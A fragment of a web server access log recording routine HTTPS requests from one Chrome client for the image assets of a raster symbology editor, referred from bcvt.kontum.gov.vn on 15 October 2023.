Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 863 2023-10-15 23:31:22 103.153.214.94 GET /raster-symbology-editor-band-combination-landuse.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:22 103.153.214.94 GET /raster-symbology-editor-band-combination-bathymetric.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:24 103.153.214.94 GET /raster-symbology-editor-band-combination-vegetation.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:24 103.153.214.94 GET /raster-symbology-editor-band-combination-color-infrared.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:24 103.153.214.94 GET /raster-symbology-editor-symbology-type-rgb.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:25 103.153.214.94 GET /raster-symbology-editor-symbology-type-stretch.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:25 103.153.214.94 GET /raster-symbology-editor-symbology-type-unique-value.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:25 103.153.214.94 GET /raster-symbology-editor-symbology-type-discrete.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:27 103.153.214.94 GET /handles.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:27 103.153.214.94 GET /Loading_Indicator_double_32.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:29 103.153.214.94 GET /favicon.ico - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1447